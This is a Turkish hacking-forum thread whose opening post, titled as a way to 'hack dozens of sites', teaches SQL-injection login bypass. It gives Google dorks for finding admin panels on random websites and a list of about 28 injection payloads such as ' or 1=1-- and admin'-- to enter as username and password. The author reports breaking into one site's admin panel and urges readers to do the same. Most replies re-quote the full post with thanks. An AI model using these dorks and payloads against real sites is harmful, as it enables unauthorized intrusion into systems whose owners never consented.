Login Bypass Nedir? # Onlarca Site Hackleyin.

Butcherb3y

Uzman üye
1 Eyl 2022
1,595
1,185
Anıtkabir
s5ckkvo.jpeg


Herkese merhabalar bugün forumda da bir çok kez ele alınmış Login Bypass nedir bundan bahsedicem
hadi geçelim.

1. Login Bypass nedir?
2. Admin Paneller nasıl bulunur?
3. Login Bypass nasıl yapılır?


Login Bypass Nedir?
Login Bypass, bu açık türü SQL açığına girer. Özellikle PHP tabanlı MySQL ve MariaDB gibi veritabanı kullanan siteler için geçerlidir. Username ve Password kısmına çeşitli bypass edici kodların yazılması ile sitenin admin(yönetici)
kısmına sızılmaya çalışılır. Kısaca mantık böyledir.

Admin Paneller Nasıl Bulunur?
Admin Panelleri bulmak için google dorklarını kullanıcaz. Dork nedir bilmiyorsanız ilk konuma bakabilirsiniz aşagida link verecem. Şimdi google dorkumuzu girdik ve sonuç olarak sitelerin admin panelleri geldi.
örnek dorklar.

Kod:
inurl:admin.php?id=

inurl:/admin/login.php

inurl:/admin/index.php

Evet dorkumuzu yazdık ve çıkan sonuçlara bakalım.
bakınız bir sürü admin panel çıktı.

ogrklrv.png




Login Bypass nasıl yapılır?
Öncelikle bir admin panel seçmemiz lazım ve paneldeki username password kısmına aşağida verdiğim kodları yazıp denememiz gerekiyor, ikisinede yazarken aynı kodu yazacaz. hadi admin panel seçelim.

mlku0tv.png


Seçtiğim panel bu
username ve password kısmına denenecek kodlar


Kod:
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
Hadi Deniyelim.
5xsxw05.png



Gördüğünüz gibi ben ' or 1=1 or ''=' bu kodu koydum ve
login dedim
hwmf6s4.png

Sizinde Gördüğünüz gibi bypass edici kod ile
sitenin admin paneline girdik sizde bu yöntem ile sitelere girebilirsiniz teşekkürler.
@El Petr

önceki dork nedir konum: https://www.turkhackteam.org/konular/dork-nedir-nasil-yazilir-nasil-taranir.2044156/

 
Son düzenleme:

rootibo

Kıdemli Üye
13 Mar 2023
2,168
1,460
s5ckkvo.jpeg


Herkese merhabalar bugün forumda da bir çok kez ele alınmış Login Bypass nedir bundan bahsedicem
hadi geçelim.
[ICODE][/ICODE]
1. Login Bypass nedir?
2. Admin Paneller nasıl bulunur?
3. Login Bypass nasıl yapılır?


Login Bypass Nedir?
Login Bypass, bu açık türü SQL açığına girer. Özellikle PHP tabanlı MySQL ve MariaDB gibi veritabanı kullanan siteler için geçerlidir. Username ve Password kısmına çeşitli bypass edici kodların yazılması ile sitenin admin(yönetici)
kısmına sızılmaya çalışılır. Kısaca mantık böyledir.

Admin Paneller Nasıl Bulunur?
Admin Panelleri bulmak için google dorklarını kullanıcaz. Dork nedir bilmiyorsanız ilk konuma bakabilirsiniz aşagida link verecem. Şimdi google dorkumuzu girdik ve sonuç olarak sitelerin admin panelleri geldi.
örnek dorklar.

Kod:
inurl:admin.php?id=

inurl:/admin/login.php

inurl:/admin/index.php

Evet dorkumuzu yazdık ve çıkan sonuçlara bakalım.
bakınız bir sürü admin panel çıktı.

ogrklrv.png




Login Bypass nasıl yapılır?
Öncelikle bir admin panel seçmemiz lazım ve paneldeki username password kısmına aşağida verdiğim kodları yazıp denememiz gerekiyor, ikisinede yazarken aynı kodu yazacaz. hadi admin panel seçelim.

mlku0tv.png


Seçtiğim panel bu
username ve password kısmına denenecek kodlar


Kod:
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
Hadi Deniyelim.
5xsxw05.png



Gördüğünüz gibi ben ' or 1=1 or ''=' bu kodu koydum ve
login dedim
hwmf6s4.png

Sizinde Gördüğünüz gibi bypass edici kod ile
sitenin admin paneline girdik sizde bu yöntem ile sitelere girebilirsiniz teşekkürler.
@El Petr

önceki dork nedir konum: https://www.turkhackteam.org/konular/dork-nedir-nasil-yazilir-nasil-taranir.2044156/

Eline saglik butcher
 

Fladd

Yeni üye
27 Ağu 2023
49
12
s5ckkvo.jpeg


Herkese merhabalar bugün forumda da bir çok kez ele alınmış Login Bypass nedir bundan bahsedicem
hadi geçelim.

1. Login Bypass nedir?
2. Admin Paneller nasıl bulunur?
3. Login Bypass nasıl yapılır?


Login Bypass Nedir?
Login Bypass, bu açık türü SQL açığına girer. Özellikle PHP tabanlı MySQL ve MariaDB gibi veritabanı kullanan siteler için geçerlidir. Username ve Password kısmına çeşitli bypass edici kodların yazılması ile sitenin admin(yönetici)
kısmına sızılmaya çalışılır. Kısaca mantık böyledir.

Admin Paneller Nasıl Bulunur?
Admin Panelleri bulmak için google dorklarını kullanıcaz. Dork nedir bilmiyorsanız ilk konuma bakabilirsiniz aşagida link verecem. Şimdi google dorkumuzu girdik ve sonuç olarak sitelerin admin panelleri geldi.
örnek dorklar.

Kod:
inurl:admin.php?id=

inurl:/admin/login.php

inurl:/admin/index.php

Evet dorkumuzu yazdık ve çıkan sonuçlara bakalım.
bakınız bir sürü admin panel çıktı.

ogrklrv.png




Login Bypass nasıl yapılır?
Öncelikle bir admin panel seçmemiz lazım ve paneldeki username password kısmına aşağida verdiğim kodları yazıp denememiz gerekiyor, ikisinede yazarken aynı kodu yazacaz. hadi admin panel seçelim.

mlku0tv.png


Seçtiğim panel bu
username ve password kısmına denenecek kodlar


Kod:
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
Hadi Deniyelim.
5xsxw05.png



Gördüğünüz gibi ben ' or 1=1 or ''=' bu kodu koydum ve
login dedim
hwmf6s4.png

Sizinde Gördüğünüz gibi bypass edici kod ile
sitenin admin paneline girdik sizde bu yöntem ile sitelere girebilirsiniz teşekkürler.
@El Petr

önceki dork nedir konum: https://www.turkhackteam.org/konular/dork-nedir-nasil-yazilir-nasil-taranir.2044156/

Eline sağlık
 

akla46

Katılımcı Üye
5 Şub 2022
267
73
s5ckkvo.jpeg


Herkese merhabalar bugün forumda da bir çok kez ele alınmış Login Bypass nedir bundan bahsedicem
hadi geçelim.

1. Login Bypass nedir?
2. Admin Paneller nasıl bulunur?
3. Login Bypass nasıl yapılır?


Login Bypass Nedir?
Login Bypass, bu açık türü SQL açığına girer. Özellikle PHP tabanlı MySQL ve MariaDB gibi veritabanı kullanan siteler için geçerlidir. Username ve Password kısmına çeşitli bypass edici kodların yazılması ile sitenin admin(yönetici)
kısmına sızılmaya çalışılır. Kısaca mantık böyledir.

Admin Paneller Nasıl Bulunur?
Admin Panelleri bulmak için google dorklarını kullanıcaz. Dork nedir bilmiyorsanız ilk konuma bakabilirsiniz aşagida link verecem. Şimdi google dorkumuzu girdik ve sonuç olarak sitelerin admin panelleri geldi.
örnek dorklar.

Kod:
inurl:admin.php?id=

inurl:/admin/login.php

inurl:/admin/index.php

Evet dorkumuzu yazdık ve çıkan sonuçlara bakalım.
bakınız bir sürü admin panel çıktı.

ogrklrv.png




Login Bypass nasıl yapılır?
Öncelikle bir admin panel seçmemiz lazım ve paneldeki username password kısmına aşağida verdiğim kodları yazıp denememiz gerekiyor, ikisinede yazarken aynı kodu yazacaz. hadi admin panel seçelim.

mlku0tv.png


Seçtiğim panel bu
username ve password kısmına denenecek kodlar


Kod:
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
Hadi Deniyelim.
5xsxw05.png



Gördüğünüz gibi ben ' or 1=1 or ''=' bu kodu koydum ve
login dedim
hwmf6s4.png

Sizinde Gördüğünüz gibi bypass edici kod ile
sitenin admin paneline girdik sizde bu yöntem ile sitelere girebilirsiniz teşekkürler.
@El Petr

önceki dork nedir konum: https://www.turkhackteam.org/konular/dork-nedir-nasil-yazilir-nasil-taranir.2044156/

bana göre böyle deyilde bence mesala oraya yazdımız o sql kodları ne yapıyoda bizi admin paneline girdiriyo bu açığı dorksuz nasıl buluruz sitede vs vs yazılması lazım
 

Butcherb3y

Uzman üye
1 Eyl 2022
1,595
1,185
Anıtkabir
bana göre böyle deyilde bence mesala oraya yazdımız o sql kodları ne yapıyoda bizi admin paneline girdiriyo bu açığı dorksuz nasıl buluruz sitede vs vs yazılması lazım
Nasıl yonlendiriyo derken adı üstünde login Bypass açığı denetimden kaynaklı basit bir açık dorksuz nasıl bulunur diyosan zaten böyle siteleri bulmak için yine Dork kullanmak gerekecek SQL açığı yaparken girdin normal dorkunu siteye girdin o sitenin admin panelini bulursun varsa ona denersin.
 

bqtw

Üye
22 May 2023
166
41
s5ckkvo.jpeg


Herkese merhabalar bugün forumda da bir çok kez ele alınmış Login Bypass nedir bundan bahsedicem
hadi geçelim.

1. Login Bypass nedir?
2. Admin Paneller nasıl bulunur?
3. Login Bypass nasıl yapılır?


Login Bypass Nedir?
Login Bypass, bu açık türü SQL açığına girer. Özellikle PHP tabanlı MySQL ve MariaDB gibi veritabanı kullanan siteler için geçerlidir. Username ve Password kısmına çeşitli bypass edici kodların yazılması ile sitenin admin(yönetici)
kısmına sızılmaya çalışılır. Kısaca mantık böyledir.

Admin Paneller Nasıl Bulunur?
Admin Panelleri bulmak için google dorklarını kullanıcaz. Dork nedir bilmiyorsanız ilk konuma bakabilirsiniz aşagida link verecem. Şimdi google dorkumuzu girdik ve sonuç olarak sitelerin admin panelleri geldi.
örnek dorklar.

Kod:
inurl:admin.php?id=

inurl:/admin/login.php

inurl:/admin/index.php

Evet dorkumuzu yazdık ve çıkan sonuçlara bakalım.
bakınız bir sürü admin panel çıktı.

ogrklrv.png




Login Bypass nasıl yapılır?
Öncelikle bir admin panel seçmemiz lazım ve paneldeki username password kısmına aşağida verdiğim kodları yazıp denememiz gerekiyor, ikisinede yazarken aynı kodu yazacaz. hadi admin panel seçelim.

mlku0tv.png


Seçtiğim panel bu
username ve password kısmına denenecek kodlar


Kod:
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
Hadi Deniyelim.
5xsxw05.png



Gördüğünüz gibi ben ' or 1=1 or ''=' bu kodu koydum ve
login dedim
hwmf6s4.png

Sizinde Gördüğünüz gibi bypass edici kod ile
sitenin admin paneline girdik sizde bu yöntem ile sitelere girebilirsiniz teşekkürler.
@El Petr

önceki dork nedir konum: https://www.turkhackteam.org/konular/dork-nedir-nasil-yazilir-nasil-taranir.2044156/

Eline sağlık hocam ama sifre kısmına ne giriceğimizi anlamadım 😅
Düzenleme:Hallettim tamam 👍
 
Son düzenleme:

Protofy

Üye
5 Nis 2023
65
20
konumu nabacan olm
s5ckkvo.jpeg


Herkese merhabalar bugün forumda da bir çok kez ele alınmış Login Bypass nedir bundan bahsedicem
hadi geçelim.

1. Login Bypass nedir?
2. Admin Paneller nasıl bulunur?
3. Login Bypass nasıl yapılır?


Login Bypass Nedir?
Login Bypass, bu açık türü SQL açığına girer. Özellikle PHP tabanlı MySQL ve MariaDB gibi veritabanı kullanan siteler için geçerlidir. Username ve Password kısmına çeşitli bypass edici kodların yazılması ile sitenin admin(yönetici)
kısmına sızılmaya çalışılır. Kısaca mantık böyledir.

Admin Paneller Nasıl Bulunur?
Admin Panelleri bulmak için google dorklarını kullanıcaz. Dork nedir bilmiyorsanız ilk konuma bakabilirsiniz aşagida link verecem. Şimdi google dorkumuzu girdik ve sonuç olarak sitelerin admin panelleri geldi.
örnek dorklar.

Kod:
inurl:admin.php?id=

inurl:/admin/login.php

inurl:/admin/index.php

Evet dorkumuzu yazdık ve çıkan sonuçlara bakalım.
bakınız bir sürü admin panel çıktı.

ogrklrv.png




Login Bypass nasıl yapılır?
Öncelikle bir admin panel seçmemiz lazım ve paneldeki username password kısmına aşağida verdiğim kodları yazıp denememiz gerekiyor, ikisinede yazarken aynı kodu yazacaz. hadi admin panel seçelim.

mlku0tv.png


Seçtiğim panel bu
username ve password kısmına denenecek kodlar


Kod:
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
Hadi Deniyelim.
5xsxw05.png



Gördüğünüz gibi ben ' or 1=1 or ''=' bu kodu koydum ve
login dedim
hwmf6s4.png

Sizinde Gördüğünüz gibi bypass edici kod ile
sitenin admin paneline girdik sizde bu yöntem ile sitelere girebilirsiniz teşekkürler.
@El Petr

önceki dork nedir konum: https://www.turkhackteam.org/konular/dork-nedir-nasil-yazilir-nasil-taranir.2044156/

Eline Sağlık Hocam Faydalı Konu.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.